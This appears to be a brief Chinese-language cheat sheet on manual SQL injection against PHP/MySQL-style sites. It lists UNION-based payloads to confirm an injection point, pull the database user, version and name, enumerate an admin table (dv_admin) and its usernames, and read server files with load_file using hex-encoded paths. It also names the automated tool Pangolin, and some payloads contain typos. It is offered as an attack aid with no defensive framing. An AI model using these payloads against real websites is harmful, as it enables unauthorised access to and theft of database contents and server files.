php.ini

magic_quotes_gpc=on

单双引号，斜杠等前面加转义字符

union查询中如果是oracle数据库一定要加表名，而且前后表对应列的数据类型要兼容。利用这个可以判断前表那列的字符，

如果前表出错，将返回后表的结果

手工注入：

判断注入点 and1=1/and 1=2

判断用户名字id=-1 union select user()>0

判断版本号：id=-1 union select version()

判断当前连接数据库:id=-1unon select database()

判断表名：

id=-1 unionselect 1 from dv_admin

判断值:

 id=-1 union select username from dv_admin

读文件：load_file(c:\boot.ini)路径要转为16进制

自动化工具：pangolin